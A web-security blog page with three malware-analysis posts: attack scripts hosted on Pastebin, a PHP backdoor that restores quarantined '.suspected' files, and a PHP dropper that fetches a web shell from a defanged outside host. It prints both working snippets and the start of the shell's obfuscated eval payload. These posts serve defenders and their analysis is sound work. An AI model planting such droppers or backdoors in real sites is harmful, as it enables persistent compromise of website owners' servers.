Category: Website Security

Spamming Stopped by Pastebin

We wrote multiple times about malware attacks that store their scripts on Pastebin.com and load them either to the server once they break into it or directly to the infected web pages

However Pastebin.com can’t be called a reliable hosting for malware. You can report any paste and it will be removed if Pastebin.com finds it inacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report them.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it and create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, recently our scanner found this file on a hacked site:skin/adminhtml/default/kontools/promailerv2.php.


Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It was indeed removed. We found its original content in Google’s cache. It, as the filename implies, contained the code of a PHP script called “PRO Mailer V2” - a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses. You may help many people. If you ever have a need to publish some malicious (suspicious) code on Pastebin.com or another similar service (e.g. if you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it being used in attacks directly off of Pastebin.com. Also consider making such pastes private and expire in a minimal reasonable time.

If you find the "Pastebin.com - Page Removed" files on your server, it’s a strong indication of a hack and you should investigate this issue. Let us know if you need a professional help.

Jan 6, 2017 by Denis Sinegubko

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions and much more. If they happen to find any of those instances, it’s a common practice to either remove or rename the file in question.

If the file being flagged hits a certain amount of suspicious code or raises red flags based on different variables, hosting companies may rename those files from file.php to file.php.suspected (Appending .suspected in the end) - this way the file loses its ability to be interpreted by the webserver. However, sometimes there are backdoors nearby ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

Very short, but interesting snippet that checks if the file wp-rmcc.php.suspected exists. If it does, the code changes its permission to 777 and renames it to wp-rmcc.php, therefore allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the permissions for the file read-only to prevent easy removal of the malicious code. Of course the example above is very simple and targeted to only that particular file, but the script could be easily modified to rename all files with the .suspected extension.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website by having those other small infected files around, even if the obvious backdoor is renamed/blocked. That’s why simply renaming those easy to spot malicious files may not solve the case.

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Jan 3, 2017 by Andrey Kucherov

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds, is injecting a file known as Dropper that downloads the real malware into the system. The Dropper could go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system as you can see in the snippet below:  

<?php
if( $z = fopen( 'include4.php', 'w') ) {
 if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
 fclose( $z );
 echo '0';
 } else {
 echo '1';
 }
} else {
 echo '2';
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as a result of the request. - the well known exit code in UNIX systems for successful execution of command. If the operation can’t download the webshell, it prints 1; if it can’t create the file in which the shell will resides  it prints 2.  

The following code is the content of the webshell fetched from the 'hxxttp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

Dec 29, 2016 by Yuliyan Tsvetkov